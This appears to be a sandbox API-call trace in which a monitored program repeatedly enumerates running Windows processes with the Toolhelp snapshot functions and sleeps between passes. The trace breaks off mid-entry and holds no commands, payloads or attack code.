[0101.474] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0101.475] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0101.476] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0101.477] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0101.519] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.520] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0101.521] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xae4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) 
returned 1 [0101.522] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0101.524] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb74, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0101.525] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0101.526] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbbc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0101.527] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0101.528] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xb88, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0101.530] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0101.531] 
CloseHandle (hObject=0xbc) returned 1 [0101.531] Sleep (dwMilliseconds=0x12c) [0101.830] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0101.836] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.837] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0101.837] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0101.838] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.839] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0101.840] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.840] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0101.841] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0101.842] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0101.843] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0101.843] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.844] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.845] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.846] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.858] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.858] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0101.859] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.860] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.860] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0101.870] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.872] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0101.873] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0101.874] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0101.875] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0101.877] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.878] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0101.879] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0101.881] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0101.882] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0101.883] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0101.885] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0101.886] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0101.887] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0101.888] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0101.890] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0101.891] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0101.957] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0101.959] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0101.960] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0101.961] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0101.962] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0101.963] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0101.964] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0101.965] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0101.966] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0101.967] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0101.968] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.969] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0101.970] 
CloseHandle (hObject=0xc4) returned 1 [0101.970] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0101.975] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.976] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0101.976] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0101.977] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.978] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0101.978] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.979] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0101.979] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0101.980] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0101.981] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0101.981] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.982] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.983] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.983] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.984] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.985] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0101.985] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.986] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.987] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0101.988] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, 